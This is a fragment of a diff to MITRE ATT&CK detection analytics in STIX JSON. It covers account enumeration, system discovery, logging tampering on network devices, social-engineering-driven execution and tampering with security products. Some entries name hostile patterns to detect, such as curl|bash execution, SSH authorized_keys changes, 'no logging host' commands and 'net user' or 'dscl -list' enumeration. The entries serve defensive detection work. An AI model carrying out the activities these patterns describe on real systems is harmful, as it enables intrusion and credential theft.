+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1374",
+                            "external_id": "AN1374"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1374",
+                    "description": "Detects disabling AAA, syslog, SNMP traps, ACL logging, or security features on routers/switches/firewalls; correlates privileged login followed by configuration commit reducing visibility.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "networkdevice:config",
+                            "channel": "write: Startup configuration changes disabling security checks"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ConfigBaseline",
+                            "description": "Reference configuration state for detecting unauthorized modifications."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:33:32.261000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--54bfcc92-e04c-4eac-9aa2-c10b7574088c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0525#AN1452",
+                            "external_id": "AN1452"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1452",
+                    "description": "Detection of processes executing system environment inspection operations followed by access to OS configuration APIs or registry locations that expose OS version, architecture, patch level, or hardware characteristics. Defenders observe process execution retrieving system configuration metadata immediately after process startup.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=13, 14"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Detect multiple discovery commands executed in short succession."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Scope alerts to unusual user accounts or service accounts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-03-13 22:32:32.447000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e576eaeb-2158-40f9-8edb-c119eac56442",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1612",
+                            "external_id": "AN1612"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1612",
+                    "description": "Detection of processes performing local or domain account enumeration by invoking account directory queries or security APIs followed by structured output of account lists. The defender observes command execution or API invocation patterns that retrieve account information and produce enumeration artifacts shortly afterward.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4798, 4799"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CommandLinePattern",
+                            "description": "Match variations in enumeration commands like 'net user', 'Get-ADUser', 'dsquery'."
+                        },
+                        {
+                            "field": "TimeWindow",
+                            "description": "Short burst of account enumeration commands may indicate automation."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Restrict to non-admin accounts or unexpected users executing enumeration commands."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-13 22:22:07.647000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--24aa5ee9-ba7f-4991-b32a-27d40ee2d010",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1614",
+                            "external_id": "AN1614"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1614",
+                    "description": "Detection of account enumeration through directory service queries or system utilities accessing account metadata stores, followed by structured enumeration output.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "macos:unifiedlog",
+                            "channel": "process event"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
+                            "name": "macos:unifiedlog",
+                            "channel": "DirectoryService queries retrieving account information"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CommandLine",
+                            "description": "Tune for dscl -list, dscacheutil -q user, id -un, etc."
+                        },
+                        {
+                            "field": "ExecutionContext",
+                            "description": "Alert if enumeration is performed in non-console session or by unusual users."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-03-13 22:24:28.695000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--5d7158ce-17f5-4643-bde2-c0a4f2ba0b73",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1615",
+                            "external_id": "AN1615"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1615",
+                    "description": "Detection of enumeration of identity entities through cloud provider APIs where principals retrieve account metadata such as IAM users or roles in rapid succession.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                            "name": "AWS:CloudTrail",
+                            "channel": "DescribeUsers / ListUsers / GetUser"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "API_Method",
+                            "description": "Tune based on which IAM APIs are used and their frequency."
+                        },
+                        {
+                            "field": "CallerType",
+                            "description": "Differentiate user-initiated from automated/scripted enumeration."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-03-13 22:30:14.543000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--cb177f89-c8a4-4233-a2e4-3fdd02dccba1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1616",
+                            "external_id": "AN1616"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1616",
+                    "description": "Detection of identity directory enumeration through API calls or administrative queries retrieving multiple account objects within a short interval.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                            "name": "azure:signinlogs",
+                            "channel": "Graph API Query"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
+                            "name": "saas:okta",
+                            "channel": "User Enumeration Events"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "QueryType",
+                            "description": "Detect user vs role enumeration. Tune based on query scope."
+                        },
+                        {
+                            "field": "AppContext",
+                            "description": "Correlate enumeration with unexpected app registrations or identities."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-13 22:29:39.660000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c4973f27-c8db-4478-aaf8-eb73580fceec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1617",
+                            "external_id": "AN1617"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1617",
+                    "description": "Detection of enumeration activity when system processes query ESXi host account configuration or management APIs to retrieve user account listings.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "esxi:vpxd",
+                            "channel": "vCenter Management"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CommandPattern",
+                            "description": "Tune based on known enumeration commands: 'vim-cmd vimsvc/auth/userlist'."
+                        },
+                        {
+                            "field": "PrivilegedSession",
+                            "description": "Elevated enumeration from vpxuser or root may indicate threat activity."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "ESXi"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-13 22:28:56.147000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f238e0f3-7354-4304-9101-69cefd8446fc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:23:55.764000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2033",
+                            "external_id": "AN2033"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2033",
+                    "description": "Detects suspicious inbound communications or collaboration requests followed by rapid sensitive user actions such as file sharing changes, macro enablement, OAuth consent, credential submission, or financial workflow approvals that deviate from historical relationships or normal approval patterns.\n      ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "m365:unified",
+                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "m365:exchange",
+                            "channel": "External sender message followed by user action involving links or attachments"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "m365:teams",
+                            "channel": "External chat request or new tenant communication preceding approval activity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ActionAfterMessageWindow",
+                            "description": "Time window between inbound communication and sensitive action"
+                        },
+                        {
+                            "field": "TrustedDomainAllowlist",
+                            "description": "Known legitimate vendors or partner domains"
+                        },
+                        {
+                            "field": "ApprovalAmountThreshold",
+                            "description": "Monetary threshold for finance workflows"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Office Suite"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:33:42.205000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e817eb45-0830-476d-9fd7-8e8acb14af8a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:27:31.873000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2034",
+                            "external_id": "AN2034"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2034",
+                    "description": "Detects consent grants, password resets, role changes, external sharing, or token creation shortly after user interaction with messages, invites, or help desk workflows. Emphasis is placed on unusual requester relationships, new device context, or off-hours approvals.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                            "name": "saas:okta",
+                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "saas:slack",
+                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "saas:zoom",
+                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "RequesterNoveltyDays",
+                            "description": "How long since requestor last interacted with user"
+                        },
+                        {
+                            "field": "GeoVelocityThreshold",
+                            "description": "Distance/time anomaly for follow-on login"
+                        },
+                        {
+                            "field": "AfterHoursDefinition",
+                            "description": "Organization-specific off-hours period"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:33:35.460000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--983e1849-6af7-491e-9605-46b9bf54bbd1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:31:03.795000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2035",
+                            "external_id": "AN2035"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2035",
+                    "description": "Detects user execution of newly received content or instructions shortly after external communication, including script launches, Office child process spawning, browser-to-script execution chains, or credential prompts followed by new logon sessions.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4624, 4648"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=11"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "EmailToExecutionWindow",
+                            "description": "Time between message delivery and process launch"
+                        },
+                        {
+                            "field": "OfficeChildProcessAllowlist",
+                            "description": "Approved Office child process patterns"
+                        },
+                        {
+                            "field": "NewLogonWindow",
+                            "description": "Time after credential prompt to monitor new sessions"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-24 20:32:37.936000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--fc19b602-2811-418f-aa98-1b49f1355743",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:38:58.641000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2036",
+                            "external_id": "AN2036"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2036",
+                    "description": "Detects user-authorized execution of downloaded content or scripts after communication prompts, including browser downloads followed by osascript, shell, or installer execution and subsequent network activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connection after script or installer launch"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "macos:unifiedlog",
+                            "channel": "Recent download opened or executed"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "DownloadToExecutionWindow",
+                            "description": "Time between download and launch"
+                        },
+                        {
+                            "field": "InstallerParentAllowlist",
+                            "description": "Legitimate software deployment parents"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-24 20:33:48.643000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--54bb8256-cbe8-4088-9cff-b03711bd7841",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:43:32.659000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0899#AN2037",
+                            "external_id": "AN2037"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2037",
+                    "description": "Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connection after script or installer launch"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "auditd:PATH",
+                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "RemoteScriptExecutionPatterns",
+                            "description": "Organization-specific admin automation patterns to exclude"
+                        },
+                        {
+                            "field": "TicketToExecutionWindow",
+                            "description": "Time from help desk/chat event to command execution"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:31:48.301000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7ec436a3-dd31-4d23-a51b-0e03d3c474bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 16:54:55.315000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2038",
+                            "external_id": "AN2038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2038",
+                    "description": "Detects suspicious interactions with security products followed by service crashes, unexpected restarts, driver unloads, telemetry gaps, or tamper-state changes. Correlates exploit precursor behavior with immediate degradation of defensive services and follow-on process execution.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7035"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03",
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=6"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CrashCorrelationWindow",
+                            "description": "Time between suspicious interaction and security service failure"
+                        },
+                        {
+                            "field": "ProtectedServiceList",
+                            "description": "Security agents/services expected to remain stable"
